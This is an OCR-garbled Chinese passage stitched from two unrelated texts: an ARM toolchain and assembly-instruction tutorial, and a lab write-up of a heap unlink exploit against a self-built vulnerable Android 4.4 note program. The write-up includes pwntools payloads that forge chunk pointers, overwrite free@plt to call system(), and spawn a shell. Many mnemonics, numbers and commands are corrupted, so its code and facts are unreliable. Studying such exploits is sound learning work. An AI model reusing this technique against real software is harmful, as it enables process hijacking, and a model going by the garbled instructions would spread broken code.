称 ; -T 指 明 采 用 的 连接 脚本 文件 (也 可 以 使 用 -Ttext address，address 表 示 执 行 区 地 
Ab) ; 最 后 是 需要 连接 的 目标 文件 列表 。 

(5) 生成 二 进 制 代码 
连接 生成 的 elf 文 件 还 不 能 直接 下 载 执 行 ， 通 过 objcopy 工 具 可 生成 最 终 的 二 进 制 文件 : 
arm-linux-objcopy -0 binary bootstrap.elf bootstrap.bin 
其 中 -O binary 指 定 生成 为 二 进 制 格式 文件 。Objcopy 还 可 以 生成 S 格 式 的 文件 ， 只 需 将 参 
数 换 成 -O srec。 还 可 以 使 用 -S 选项 ， 移 除 所 有 的 符号 信息 及 重 定位 信息 。 如 果 想 将 生成 
的 目标 代码 反 汇 编 ， 还 可 以 用 objdump 工 具 : 

arm-linux-objdump -D bootstrap.elf 


至 此 ， 所 生成 的 目标 文件 就 可 以 直接 写 入 Flash 中 运行 了 。 


. Makefile zz 45] 


example: head.s main.c 

arm-linux-gcc -c -o head.o head.s 

arm-linux-gcc -c -o main.o main.c 

arm-linux-ld -Tlink.lds head.o ain.o -o example.elf 
arm-linux-objcopy -0 binary -S example tmp.o example 
arm-linux-objdump -D -b binary -m arm example >ttt.s 


三 . 调试 工具 


Linux 下 的 GNU 调 试 工具 主要 是 gdb、gdbserver 和 kgdb。 其 中 gdb 和 gdbserver 可 完成 对 
目标 板 上 Linux 下 应 用 程序 的 远程 调试 。gdbserver 是 一 个 很 小 的 应 用 程序 ， 运 行 于 目标 
板 上 ， 可 监控 被 调试 进程 的 运行 ， 并 通过 串口 与 上 位 机 上 的 gdb 通 信 。 开 发 者 可 以 通过 上 
位 机 的 gdb 输 入 命令 ， 控 制 目标 板 上 进程 的 运行 ， 查 看 内 存 和 寄存 器 的 内 容 。gdb5.1.1 以 
后 的 版 本 加 入 了 对 ARM 处 理 器 的 支持 ， 在 初始 化 时 加 入 --target=arm 参数 可 直接 生成 基 
于 ARM 平 台 的 gdbserver。gdb 工 具 可 以 从 ftp:/ftp.gnu.org/pub/gnu/gdb/ EF R ° 

对 于 Linux 内 核 的 调试 ， 可 以 采用 kgdb 工 具 ， 同 样 需要 通过 串口 与 上 位 机 上 的 gdb 通 信 ， 
对 目标 板 的 Linux 内 核 进行 调试 。 可 以 从 http://oss.sgi.com/projects/kgdb/ 上 了 解 具 体 的 
使 用 方法 。 


ARM 处 理 器 是 精简 指令 集 计 算 Reduced Instruction Set Computing (RISC) 的 一 个 实例 。 
ARM 指 令 集 是 基于 精简 指令 集 计 算 机 (RISC) 设 计 的 ， 其 指令 集 的 译 码 机 制 相对 比较 简单 ， 
ARMv7-A 有 具有 32bit 的 ARM 指 令 集 和 16/32bit 的 Thumb/Thumb-2 指 令 集 ，ARM 指 令 集 的 优点 是 
执行 效率 高 但 不 足 之 处 也 很 明显 ， 就 是 代码 密度 相对 低 一 些 。 而 作为 ARM 指 令 集 子 集 的 
Thumb 指 令 集 ， 代 码 密 度 相 对 比 ARM 指 令 高 ， 而 且 坚持 了 ARM 一 贯 的 性 能 优 但 也 有 一 个 致命 
的 缺点 就 是 效 滨 低 。 正 所 谓 鱼 和 能 党 不 可 兼 得 ， 这 也 是 数字 逻辑 电路 设计 所 谓 的 时 间 和 空间 
的 问题 ; 而 Thumb-2 指 令 集 多 为 32bit 的 指令 ， 对 于 上 述 的 ARM 指 令 和 Thumb 指 令 做 了 一 个 折 
中 ， 代 码 执行 效率 和 密度 都 相对 比较 适中 ， 几 乎 所 有 的 ARM 指 令 都 可 以 条 件 执 行 ， 而 另外 两 
者 仅 有 部 分 才 具 备 此 功能 ， 三 种 指令 均 可 相互 调用 ， 而 且 指 令 之 间 状 态 切换 开销 很 小 ， 几 乎 
可 以 忽略 。 


一 、ARM 指 令 集 格式 


基本 格式 * <opcode> («cond») (S) «Rd», «Rn», {<opcode2>} 

< > 尖 括 号 里 面 的 指令 助 记 符 是 必须 的 ， 而 {} 花 括号 里 面 的 是 可 选 的 。 
.0pcode : 比如 MOV，LDR 

.cond : 即 Condition， 执 行 条 件 ， 与 CPSR 的 条 件 标志 位 对 应 。 


FHB (cond) 助 记 符 ax CPSR 中 的 条 件 标志 位 
0000 eq 相等 Z=1 
0001 ne 不 相等 Z=0 
0010 cs/hs 无 罕 写 数 太 于 /等 于 C=1 
0011 cc/lo 无 罕 写 数 小 于 C=0 
0100 mi 负数 N=1 
0101 pl 非 负数 N=0 
0110 vs +i V-1 
0111 vc ALi ¥=0 
1000 hi 无 符号 数 太 于 C-1Hz-0 
1001 ls 无 符号 数 小 于 /等 于 C-0HZ-1 
1010 ge 带 罕 号 数 太 于 /等 于 N=1 ，W=1 或 N=0, V-0 
1011 1t 带 罕 号 数 小 于 N=1, Y=0 或 N=0, V=1 
1100 gt 带 罕 号 数 太 于 Z=0 AN=V 
1101 le 带 罕 号 数 小 于 /等 于 Z=1 AN! =V 
1110 al 无 条 件 执行 一 一 
1111 nv 从 不 执行 == 


.S : 决定 是 否 影响 CPSR 的 值 

.Rd : 目标 寄存 器 

.Rn : 第 一 个 操作 数 的 寄存 器 

.opcode2 : 第 二 个 操作 数 ， 可 选 ， 可 以 是 立即 数 、 寄 存 器 、 寄 存 器 移 位 等 


二 、ARM 寻 址 方式 


1. 立即 寻 址 
mov rO, #1234 
相当 于 : r0=#1234。# 开 头 ， 表 示 16 进 制 时 ， 以 0x 开 头 ， 如 #Ox1f 。 


2. 寄存 器 寻 址 
mov rO, ri 
执行 后 ，r0O =r1。 
NOP 操作 通常 为 mov ro, ro ， 对 应 的 HEX 为 00 00 a0 e1 


寄存 器 移 位 寻 址 支持 以 下 5 种 移 位 操作 : 


LSL : 逻辑 左 移 ， 移 位 后 寄存 器 空 出 的 低位 补 0 ; 

LSR: 逻辑 右 移 ， 移 位 后 寄存 器 空 出 的 高 位 补 9 ; 

ASR: 算数 右 移 ， 移 位 过 程 中 ， 符 号 位 保存 不 变 ， 如 果 源 操作 数 为 正 数 ， 则 移 位 后 空 出 的 高 位 补 9， 和 否则 补 1。 
ROR : 循环 右 移 ， 移 位 后 ， 移 出 的 低位 ， 填 入 移 位 空 出 的 高 位 。 

RRX : 带 扩 展 的 循环 右 移 ， 操 作 数 右 移 一 位 ， 移 位 空 出 的 高 位 ， 用 C 标 志 的 值 填充 。 


mov rO, ri, 1sl #2 
相当 于 : r0 = r1««2- r1*4 。 


1. 寄存 器 间接 寻 址 
ldr re, [ri] // 取 值 
相当 于 : r0 2 *r1o 


2. Kx An 
ldr r0, [ri, #-4] 


相当 于 : r0 = *(r1 - 4) ° 


3. 多 寄存 器 寻 址 
lmdia rO, (ri, r2, r3, r4} 
LDM 是 数据 加 载 指令 ， 指 令 的 后 级 IA 表 示 ， 每 次 执行 完成 加 载 操作 后 ，R0O 寄 存 器 的 值 自 
增 1 个 字 。 
R1=[R0], R2=[RO+#4], R3=[RO+#8], R4=[RO+#1 2] 
字 表 示 一 个 32 位 的 数值 。 


4. 堆栈 寻 址 
它 需 要 特定 的 指令 完成 : 
LMDFA/STMFA, LDMEA/STMEA, LDMFD/SDMFD, LDMED/STMED 。 
LMD/STM 表示 多 寄存 器 寻 址 ， 一 次 可 以 传送 多 个 寄存 器 值 。 
FA/EA/FD/ED .. 参 考 指令 集 。 
stmfd sp!, (ri-r7, lr) @ 将 ri-r7, lr BR 多 用 于 保存 子 程序 现场 。 
ldmfd sp!, {ri~r7, lr) @ 将 ri-r7, lr 出 栈 ， 放 入 ri-r7, lr 多 用 于 恢复 子 程序 现场 


5. 块 拷贝 寻 址 
可 实现 连续 地 址 数据 从 存储 器 的 某 一 位 置 拷贝 至 另 一 位 置 。 
LDMIA/STMIA, LDMDA/STMDA, LDMIB/STMIB, LDMDB/STMDB ° 
LDM/SDM 表示 多 寄存 器 寻 址 ， 一 次 可 以 传送 多 个 寄存 器 值 。 
IA, DA, IB, DB .. 参 考 指令 集 。 
ldmia rO!, {ri-r3} @ 从 r0 指 向 的 区 域 的 值 取出 来 ， 放 到 r1-r3 中 
stmia rO!, {r1-r3} @ 将 r1-r3 的 值 取 出 来 ， 放 入 r9 指 向 的 区 域 


6. 相对 寻 址 相对 寻 址 以 PC 的 当前 值 为 基 址 ， 与 偏 移 值 相 加 ， 得 到 最 终 的 地 址 。 


bl .1c9 


.1c0: 
bl 直接 跳 到 .Ic0 处 。 


三 、ARM 汇 编 指 令 分 类 


包括 存储 加 载 类 指令 集 ， 数据 处 理 类 指令 集 ， 分 支 跳 转 类 指令 集 ， 程 序 状态 寄存 器 访问 指令 
以 及 协 处 理 器 类 指令 集 


1. 存储 加 载 类 
由 于 ARM 处 理 器 采用 了 统一 编 址 技术 ， 因 而 对 外 围 |/O， 程 序数 据 的 访问 都 要 通过 加 载 / 存 
储 (Load/Store) 指 令 来 进行 。ARM 的 加 载 /存储 指令 (LDR，STR) 是 可 以 实现 字 ， 半 字 ， 无 
符号 ， 有 符号 字 节 操作 ; 
批量 加 载 /存储 (LDM，STM) 可 以 实现 一 条 指令 加 载 存 储 多 个 存储 器 的 内 容 ， 加 载 效 率 大 
为 提高 ， 一 般 用 来 传递 参数 和 复制 数据 ， 可 以 说 是 一 般 加 载 /存储 的 加 强 版 。 
ARM 和 采用 RISC 架 构 ，CPU 本 身 不 能 直接 读 取 内 存 ， 而 需要 先 将 内 存 中 内 容 加 载 入 CPU 中 
通用 寄存 器 中 才能 被 CPU 处 理 ，ldrstr 组 合用 来 实现 ARM CPU 和 内 存 数据 交换 。 
LDR: 用 于 从 内 存 中 读 取 数 据 加 载 到 内 存 中 ; 比如 LDR RO, [R1] 表示 将 R1 所 指向 的 存储 
单元 的 内 容 加 到 R0O 寄 存 器 中 。 
STR : 将 寄存 器 中 的 数据 保存 到 内 存单 元 ; STR RO, [R1] 将 RO 寄 存 器 里 面 的 数据 保存 到 
R1 所 指向 的 内 存 中 。 
LDM : 实现 一 块 连续 的 内 存单 元 的 数据 加 载 多 个 寄存 器 中 。 
STM : 实现 在 多 个 寄存 器 的 数据 保存 到 一 块 连续 的 内 存单 元 之 中 。 
格式 > LDM/STM {cond} «mode» Rn{!} {reglist} (^) 
.Cond : 同上 
.mode : 地 址 变化 模式 共 8 种 。 


node ax 


Iå (Increase After) 每 次 传送 后 地 址 加 4 
DA (Decrease After) 每 次 传送 后 地 址 减 4 
IB (Increase Before? 每 ;次 传送 前 地 址 加 4 
DB (Decrease Before) 每 次 传送 前 地 址 减 4 
Fa (Full Ascending) EXE TESTE T5; 
FD(Full Descending) Pa TET, 
EA (Empty Ascending? TEREE 
ED(Emptyl Descending) 空 递减 堆栈 


前 面 四 个 用 于 数据 传输 ， 后 面 四 个 用 于 堆栈 操作 。 

Rn: 基 址 寄存 器 ， 不 允许 是 R15。 

Ji 感叹 号 表示 是 否 将 最 后 的 地 址 存 入 Rn。 

.Reglist : 寄存 器 列表 ， 按 从 小 到 大 的 顺序 排列 ， 当 标号 连续 时 可 用 '-' 连 接 ，{R0-R3}， 不 
连续 时 用 去 号 连接 。 

WANS (假如 寄存 器 列表 含有 PC 寄存 器 R15) 表 示 指 令 执 行 后 SPSR 的 值 自动 复制 给 CPSR ， 
EATA FLE BA PRB © 

反之 ， 默 认 操 作 的 是 用 户 模式 下 的 寄存 器 ， 并 非 当 前 特殊 模式 的 寄存 器 。 


数据 处 理 类 指令 集 

包括 数据 传送 指令 MOV， 算 术 逻 辑 运算 符 ADD，SUB，BIC，ORR， 比 较 指令 CMP ， 
TST 等 

算术 


ADD op1+op2 

ADC opit+op2+carry 

SUB opi-op2-*carry-1 

ADR : ADR 指 令 被 编译 器 用 一 条 ADD 或 者 SUB 进 行 替换 ， 在 ARM 状 态 下 ， 字 对 齐 时 加 载 范 围 是 -1020~1029， 字 节 
或 者 半 字 对 齐 时 是 -255~255 © 

ADRL : 被 编译 器 用 两 条 条 ADD 或 者 SUB 进 行 替换 ， 在 ARM 状 态 下 ， 字 对 齐 时 加 载 范围 是 -256K~256K， 字 节 或 者 
半 字 对 齐 时 是 -64K~264K。 

syntax : «operation» {<cond>}{S} Rd,Rn,operand 

examples : 

ADD rO,ri,r2 

ADDS RO, R1, #1 @ 指 令 执行 后 可 能 会 影响 CPSR 的 条 件 标志 位 。 

SUB R1,R2,#1 

例 : 通过 LDR 人 擅 指 令 ， 完 成 GPI0 的 配置 功能 ,将 9OXxE02900280 赋 给 R1 

LDR R1, -0xE0200280 

LDR RO, =0x00001111 

STR RO, [R1] 


比较 


CMP op1-op2 
TST opi & op2 
TEQ opi ^ op2 
SWP {cond} {B} Rd, Rm, [Rn]: 将 Rn 指向 的 内 容 加 载 到 目标 寄存 器 Rd，Rm 为 源 寄存 器 ， 将 该 寄存 器 的 数 
据 存储 到 Rn 指向 的 地 址 单元 。 

TST {cond} Rn, opcode2 : 将 Rn 的 值 与 opcode2 进 行 按 位 与 操作 ， 根 据 结果 更 新 CPSR 标 志 位 。 


CMP {cond} Rn opcode2 : 将 Rn 的 值 减 0pcode2, 根 据 操 作 结 果 更 新 相应 CPSR 的 标志 位 。 以 便 后 面 的 指令 


判断 是 否 执行 。 
Syntax : «operation» {<cond>} Rn,Op 
examples : 
CMP RO,R1 
CMP RO, #2 


逻辑 运算 


AND opi,op2 

EOR opi,op2 

ORR opi,op2 #0XxF@ 将 RO 的 后 4 位 置 1 (与 "1" 做 或 运算 ， 实 现 置 1 功 能 ) ， 结 果 保存 到 R9 
BIC RO, R2° #0xF@ 将 R2 的 后 4 位 置 清 零 


移动 


MOV op1, op2 

syntax : <Operation>{<cond>}{S} Rn, Op2 
Examples: 

MOV rO, ri 


3， 分 支 跳 转 指令 


当 程 序 需 要 一 些 循环 、 过 程 (procedures) 和 函数 的 时 候 ， 会 用 到 分 支 指令 。 
实现 程序 跳 转 的 方法 ， 还 可 以 直接 给 PC 寄存 器 直接 赋值 实现 跳 转 。 


B 
Branch, 2 X ° 
该 指令 不 会 影响 LR 寄 存 器 。 m. 我 们 跳 转 到 子 程序 (subroutine) > 458638 
(traceback) 我 们 曾经 在 哪儿 。 类 似 于 x86 汇 编 中 的 JMP 指 令 。 
BNE LABEL 


表示 不 为 0 时 ， 则 跳 转 到 LABEL 处 执行 。 


BL 
BL Branch with Link ， Hoodie X 


该 指令 可 以 让 子 程序 调用 ， 通 过 LR 保 存 的 PC-4 的 地 址 ， 从 子 程序 返回 ， 只 需 简 单 的 从 LR 还 原 


PC 的 值 : mov pco ° 


BX 和 BLX 

BX Branch with Exchange * # 3: 4& 0  X » 

BLX Branch with Link and Exchange > 754 4£ fe 3t 4& 6 3 X © 
BX 和 BLX 指 令 用 于 THUMB 模 式 中 ， 暂 时 不 关注 。 


.程序 状态 寄存 器 访问 指令 
通过 MSR 和 MRS 配 合 使 用 实现 对 PSR 寄 存 器 的 访问 ， 通 过 读 -修改 - 写 操作 来 实现 开关 中 
断 ， 切 换 处 理 器 模式 。 
.MRS : 读 程序 状态 寄存 器 指令 ， 将 PSR 中 的 内 容 读 入 到 寄存 器 中 MRS {cond} Rd，PSR 
MSR: 写 程序 状态 寄存 器 指令 
MSR {cond} psr_fields #immed_8MSR {cond} psr_fields, Rm 。field 指 位 域 ， 只 有 在 特权 模 
式 下 才能 对 PSR 进 行 修 改 ， 例 如 切换 到 管理 模式 : MSR cPSR c #oxD3 ,将 0xD3 写 入 CPSR 
的 低 8 位 ， 此 时 M[4:0]=0b10011， 进 入 管理 模式 。 
用 读 -修改 - 写 操作 切换 到 管理 模式 

MRS RO, CPSR @ 读 出 CPSR 的 值 

BIC RO, RO, #0x1F @ 清 0 


ORR RO, RO, #0xD3 @ 修 改 模式 
MSR CPSR cxsf, RO @ 将 修改 后 的 值 保存 到 CPSR 


， 协 处 理 器 访问 指令 

协 处 理 器 CP15 包 含 了 16 个 32bit 的 寄存 器 ， 主 要 用 于 存储 管理 。 

.MCR : ARM 寄 存 器 到 协 处 理 器 的 数据 传送 指令 

MCR {cond} P15, ©, Rd, CRn, CRm, {opcode2} 

Rd: 源 寄存 器 

CRn : 协 处 理 器 中 的 寄存 器 ， 目 标 寄存 器 ， 存 放 第 一 个 操作 数 其 编号 为 C0,C1...C15 
MRC : 协 处 理 器 到 ARM 寄 存 器 的 数据 传送 指令 

Rd : 目标 寄存 器 

CRn : 协 处 理 器 中 的 寄存 器 ， 源 寄存 器 ， 存 放 第 一 个 操作 数 其 编号 为 C0,C1....C15 
CRM : 附加 的 源 寄存 器 ， 不 需要 其 他 信息 时 CRm 为 C0 

opcode2 : 提供 附加 信息 ， 若 为 空 时 ， 指 定 为 0 即 可 
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原文 by manyface 


最 近 学 习 了 堆 的 管理 ， 如 何 进行 unlink 利 用 。 发 现 大 多 数 文章 在 讲解 利用 unlink 进 行 任意 地 址 
写 时 没有 解释 得 很 透彻 ， 看 得 是 云 里 雾 里 ， 直 到 看 到 了 shellphish 团 队 在 github 上 的 项 目 
how2heap， 才 再 明白 了 利用 unlink 进 行 任意 地 址 写 的 原理 。 于 是 自己 在 Android4.4 模 拟 器 上 
设计 了 一 个 Demo， 用 于 练习 unlink 利 用 。 下 面 基 于 这 个 Demo 来 具体 分 析 unlink 利 用 的 原理 。 
在 继续 阅读 之 前 ， 可 以 先 看 一 下 这 一 篇 博文 。 由 于 水 平 有 限 ， 不 对 的 地 方 还 请 各 位 大 牛 网 
教 。 


Demo 分 析 


该 Demo 是 一 个 native 可 执行 程序 (源码 )， 主 要 的 功能 是 建立 note， 并 保存 用 户 的 输入 到 该 
note， 每 一 个 note 的 大 小 为 0x80， 总 共 可 以 新 建 10 个 note， 每 个 note 可 以 通过 notes 这 个 全 局 
变量 来 索引 。 比 如 : 3$ 3— ^P note » € 31790 > note 0 的 内 容 为 “1234”; 然后 把 note 0 HAR 
重新 改 为 “5678”; 接着 释放 掉 note 0 ; 最 后 退出 程序 。 其 操作 如 下 : 


root@generic:/data/local/tmp # ./unlink_demo 

usage: 0:malloc 1:free 2:edit 3:exit 

input cmd and note index (eg:0,1 -> cmd=0,note_index=1): 
0,0 // 新 建 note 0 

input note len: 

4 // 输 入 note 0 的 内 容 长 度 

input note: 

1234 // 输 入 note 0 的 内 容 

usage: 0:malloc 1:free 2:edit 3:exit 

input cmd and note index (eg:0,1 -> cmd=0,note_index=1): 
2,0 ”// 修 改 note 0 的 内 容 

input note len: 

4 // 输 入 note 0 的 内 容 长 度 

input note: 

5678 // 输 入 note 0 的 内 容 

usage: 0:malloc 1:free 2:edit 3:exit 

input cmd and note index (eg:0,1 -> cmd=0,note_index=1): 
1,0  //ftxnote 0 

usage: 0:malloc 1:free 2:edit 3:exit 

input cmd and note index (eg:0,1 -> cmd=0,note_index=1): 
3 ”// 退 出 程序 


然而 在 handle_ cmd() 有 函数 中 ， 给 notes 中 的 note 赋 值 时 ， 没 有 对 note_ size 进行 检 查 ， 如 果 
note_Ssize 大 于 0x80， 会 导致 堆 溢出 。 


利用 
这 里 把 利用 过 程 分 为 6 个 步骤 : 


1. 新 建 note 0 和 note 1 


伪造 相关 数据 

free(notes[1]) > && £ unlink 

将 free@plt 的 地 址 写 入 notes[0] 

修改 free@plt 的 指令 

新 建 并 释放 notes[2]， 触 发 system(“/system/bin/sh”) 下 面 对 每 一 个 步骤 进行 详细 的 讲解 。 


oak WD 


准备 
启动 一 个 Android 4.4 模 拟 器 (Arm)， 将 unlink_ demo ` gdbfesocat push']/data/local/tmp BH % 


下 


adb push unlink_demo /data/local/tmp 
adb push gdb /data/local/tmp 
adb push socat /data/local/tmp 


进入 模拟 器 shell 环 境 ， 通 过 socat 将 unlink_demo 作 为 服务 绑 定 到 端口 12345 : 


adb shell 
cd /data/local/tmp 
./socat tcp4-listen:12345, fork exec:/unlink_demo 


在 主机 上 配置 端口 转发 : 


adb forward tcp:12345 tcp:12345 安装 Pwntools 


pip install pwntools 


step 1. 新 建 note 0 和 note 1 


self. malloc_note(0，4，"c" * 4) 
self.__malloc_note(1, 4, "c" * 4) 
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这 里 建立 了 两 个 hote， 内 容 均 初始 化 为 "cccc”， 此 时 的 内 存 布 局 如 下 图 所 示 。 







notes M 
io TEE 











size&flag 





note 0_chunk_ptr 


note O ptr 


0x80 


note 1 chunk ptr | presize feau = note_0_ptr + 0x80 
> 


note 1 ptr 


Ox80 


notes[0] 中 存 的 是 note 0 的 起 始 地 址 ，notes[1] 中 存 的 是 note 1 的 起 始 地 址 。 在 使 用 malloc 进 行 
分 配 内 存 时 ， 对 于 32 位 来 说 ， 分 配 的 内 存 是 8 字 节 对 齐 的 ， 且 实际 分 配 内 存 的 起 始 地 址 要 比 
malloc 的 返回 值 小 8， 多 出 的 8 个 字 节 表示 前 一 个 内 存 块 的 大 小 presize( 如 果 前 一 个 内 存 块 是 空 
闲 的 ) 和 当前 内 存 块 的 大 小 Size， 由 于 内 存 8 字 节 对 齐 ， 因 而 size 的 低 3 位 用 作 标 志 位 。 


step 2. 伪造 相关 数据 


首先 来 看 一 下 Android 中 空闲 内 存 块 的 结构 : 


presize 


size FIGP 
fd 
bk 





presize: 前 一 个 块 的 大 小 (如 果 前 一 个 块 是 空闲 的 ) 
size : 当前 块 的 大 小 

F 标 志 位 : 目前 还 没有 用 

C 标 志 位 : 如 果 当 前 块 已 被 分 配 ， 置 1 ; 否则 ， 置 0 
P 标 志 位 : 如 果 前 一 个 块 已 被 分 配 ， 置 1, ; 否则 ， 置 0 


如 果 C、P 都 是 0， 表 示 该 内 存 块 是 通过 mmap 得 到 的 ， 这 也 说 明了 在 内 存 中 ， 是 不 存在 两 个 连 
续 相 邻 的 大 内 存 块 。( 注 意 : Android 中 空闲 内 存 块 标志 位 的 含义 和 Linux 的 不 一 样 ) 
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fd : 下 一 个 空闲 内 存 块 的 地 址 

bk: 上 一 个 空闲 内 存 块 的 地 址 

可 见 空闲 内 存 块 被 连接 成 了 双向 空闲 链表 。 当 free 一 个 内 存 块 时 ， 会 检查 前 一 个 内 存 块 是 否 是 
空闲 的 ， 如 果 是 ， 首 先 会 调用 unlink() 函 数 将 前 一 个 空闲 内 存 块 从 空闲 链表 中 移 除 ， 然 后 将 当 

前 内 存 块 和 前 一 个 内 存 块 合并 ， 最 后 将 合并 后 的 内 存 块 加 入 空闲 链表 中 。( 当 然 也 会 检查 后 一 
个 内 存 块 是 否 空闲 。 由 于 这 里 设计 的 利用 程序 是 通过 构造 向 前 合并 触发 Unlink， 因 而 没有 讨论 
这 种 情况 ， 其 实 原理 是 一 样 的 ) 


unlink 的 关键 操作 如 下 : 


== p && B -> fd == p){ 


由 于 每 个 note 的 大 小 是 0x80， 当 对 note 填 充 内 容 的 长 度 超 过 0x80 时 ， 就 会 发 生 扒 溢出 。 

而 ， 我 们 可 以 向 note 0 填充 0x88 字 节 的 内 容 ， 多 出 的 8 个 字 节 将 会 覆盖 note 1 的 presize 和 
size&flag。 那 么 如 何 构造 填充 的 内 容 以 便 free(notes[1]) 的 时 候 触发 unlink 呢 ? 首先 修改 note 1 
中 的 P 标 志 位 ， 将 其 置 0， 这 样 就 会 认为 前 一 个 块 note 0 是 空闲 的 ; 然后 将 note 1 内 存 块 的 
presize 字 段 改 为 0x80， 这 样 就 会 认为 前 一 个 内 存 块 大 小 只 有 0x80( 包 括 presize、size&flag、 
fd 和 bk)， 且 这 0x80 字 节 的 内 容 完全 可 控 ; 最 后 设计 伪造 空闲 块 的 人 和 bk。 由 于 unlink 时 ， 会 对 
unlink 的 节点 的 合法 性 进行 检查 ， 即 该 节点 的 前 一 个 节点 的 bk 指针 必须 指向 该 节点 ， 并 且 该 节 
点 的 后 一 个 节点 的 人 指针 必须 指向 该 节点 ， 因 而 人 和 bk 不 能 随便 构造 。 由 于 全 局 变量 notes 刚 
好 指向 note 0 的 起 始 地 址 ， 可 以 把 它 认 为 是 伪造 空闲 块 的 chunk ptr， 所 以 ， 当 
fake_free_note->fake_fd = notes - 12 » fake_free_note->fake_bk = notes - 8 时 ， 就 可 以 绕 过 
unlink 的 检查 。 具 体 的 构造 代码 如 下 : 


notes_addr = int(raw input("notes address:"), 16) 

# "c"*8 + fake fd + fake bk + "c"*0x70 + fake presize + modify_pre_inuse_flag 
note0_content = "c" * 8 + p32(notes_addr - 12) + p32(notes addr - 8) + "c" * 0x70 + p3 
2(0x80) + p32(0x88 | 0x02) 

self. edit note(0, 0x88, noteO content) 


其 中 notes_addr 的 值 可 以 通过 gdb 获 得 (记得 退出 gdb) : 


rootQgeneric:/data/local/tmp # ./gdb -pid 3477 //3477 是 unLink_demo 进 程 的 id 
(gdb) p/x *(0xb004)  ”// 通 过 ida 分 析 可 以 知道 9xb004 处 存 的 是 notes_addr 的 地 址 。 
$1 = 0x1030020 


(gdb) q 
The program is running. Quit anyway (and detach it)? (y or n) y 


此 时 的 内 存 布局 如 下 : 
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===" 
presize 
size&flag 







note O ptr 









notes-8 


e 
fake free note 


notes[0] BELTS RIETI Ig 


note 1 chunk ptr 





| o: = note 0 ptr + 0x80 





~ 


note 1 ptr 





step 3. free(notes[1]) > 4 Z unlink 

self. free note(1) £ free notes[1] 

由 于 在 note 1 前 面 构造 了 一 个 伪造 的 空闲 内 存 块 ， 当 free(notes[1]) 时 ， 就 会 对 伪造 的 空闲 内 
存 块 进行 unlink 操 作 : 


notes - 12 
notes - 8 


F 
B 


p -> fd; //F 
p -> bk; //B 


if (F -> bk == p && B -> fd == p){ 
F -> bk = B; // #Pnotes[0] = B = notes - 8 
B -> fd = F; // #Pnotes[0] = F = notes -12 


} 


从 上 可 知 ，Uunlink 后 ，notes[0] 存 的 不 再 是 note 0 的 起 始 地 址 了 ， 而 是 notes - 12。 此 时 我 们 只 
关心 hotes 数 组 的 内 存 ， 其 布局 如 下 : 


notes-12 


notes-8 | 
te 
notes[0] 
notes[1] NULL 
oe 

[SN CM 
notes[9] o 
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Android 中 堆 unlink 利用 学 习 


step 4. 将 free@plt 的 地 址 写 入 notes[0] 

由 于 此 时 notes[0] = notes -12 ， 所 以 notes[0][0] 其 实 就 是 notes - 12 地 址 处 的 一 个 字 节 ， 
notes[0][12~15] 其 实 就 是 notes[0]。 因 而 我 们 可 以 通过 向 note 0 写 入 16 个 字 节 将 任意 值 写 入 
notes[0]， 这 里 将 .plt section 中 free 的 地 址 写 入 notes[0] : 


noteO content = "c" * 12 + p32(self.free plt addr) 
self. edit note(0, 0x10, noteO content) 


在 ida 中 查看 free_plt_ addr/7 0x8558 
plt:00008558 ; void freefuoid *) 


plt: 66068558 free ; CODE XREF: sub_971C:loc_97264j 
plt:88008558 ADR R12, 0x8568 

plt:8800855C ADD R12, R12, #6x2600 

plt : 66008568 LDR PC, [R12,#(free_ptr - 6xA566)]t ; inp free 


plt:88888568 ; End of function free 


此 时 notes 数 组 的 内 存 如 下 : 


notes-12 

notes8 ; void free(void =) 

notes-4 free ; CODE XREF: sut 
ADR R12, 6x8566 

notes[0] ADD R12, R12, #0x2006 
LDR PC, [R12,8(free_ptr ~ 0x6560)]* 


notes(1] SOLS ; End of function free 





step 5. 修改 free@plt 的 指令 


为 了 调用 free() 时 ， 实 际 调用 的 是 system()， 这 里 需要 将 free@plt 函 数 的 指令 修改 使 其 跳 转 到 
system() hA » HARM EMS LAY libc.soF £l : 


adb pull /system/lib/libc.so 


Ke Eida Y &A system Zt 69 48 6 : 
-text:888256808 system 
.-text:8882568n8 


-text:666246A6 var 34 - -Bx3^ 

-text:8882h5608 var 28 = -0x28 

-text:666246A6 var 2^ = -0x24 

-text:666246A6 var 28 = -0x20 

-text:666246A6 var_18 = -0x18 

-text:000246A0 var 18 - -Bx18 

.-text:88824688 

-text:88824688 LDR R3, -(off 549158 - 6x246A8) 
- text :666246A2 PUSH {R4-R6,LR} 


可 见 system 的 指令 为 thumb 指 令 ， 在 libc.so 中 的 偏 移 为 system_offset=0x246A1。 接 着 通过 读 
取 /proc/pid/maps 得 到 libc.so 的 基 址 libc_ base， 从 而 system() 在 内 存 中 的 实际 地 址 就 是 
system_addr=libc_base+system_offset 。 


>) 
CD 
co 


于 是 刚好 可 以 将 free@plt 的 指令 修改 为 : 


LDR R1, [PC] 
BLX R1 
system_addr 


假如 system_addr 为 0xXB124A561， 那 么 上 面 指令 的 机 器 码 为 : 


00109FE5 
31FF2FE1 
61A524B1 


具体 的 代码 如 下 : 


noteO content = p32(0xE59F1000) + p32(0xE12FFF31) + p32(self.system addr) 
self. edit note(0, OxC, noteO content) 


ps : 在 unlink_ demo  .got section 所 在 segment 的 flags 是 可 写 的 ， 但 是 一 运行 起 来 ， 

从 /proc/pid/maps 得 到 的 结果 却 是 该 Segment 只 读 ， 于 是 只 好 修改 unlink_ demo 文 件 中 代码 段 
的 属性 为 可 读 写 ， | o 

其 实 本 来 想 直接 修改 got 中 free 的 地 址 ， 兰 于 这 段 内 存 只 读 ， 不 知道 怎么 设置 为 可 写 。 


step 6. 新 建 并 释放 notes[2]， 触发 system(“/system/bin/sh”) 


self. malloc note(2, OxE, "/system/bin/sh") 
self. free note(2) 


当 free(notes[2]) 时 ， 由 于 free@plt 会 直接 跳 转 到 System()， 所 以 这 里 相当 于 调用 
system(notes[2])， 而 notes[2] 指 向 ysystem/bin/sh”， 所 以 这 里 相当 于 执行 
system(“/system/bin/sh”)， 从 而 得 到 shell， 利 用 成 功 ! 


运行 利用 程序 exp_unlink.py， 通 过 gdb 得 到 notes 的 地 址 ， 最 后 的 运行 结果 如 下 : 


$ python exp_unlink.py 
Opening connection to 127.0.0.1 on port 12345: Done 
The process id of ./unlink_demo is 3477 
step 1: Malloc two notes: 0, 1 
step 2: Fake fd, bk. Modify presize and pre inuse flag of notes[1] 


step 3: free ntoes[1], trigger unlink 

step 4: write free@plt address to notes[0] 

step 5: modify code of free@plt to jump to system() function 
step 6: malloc notes[2], initialize using /system/bin/sh, and then free notes[2] to trigger system('/system/bin/sh') 
Switching to interactive mode 


id 
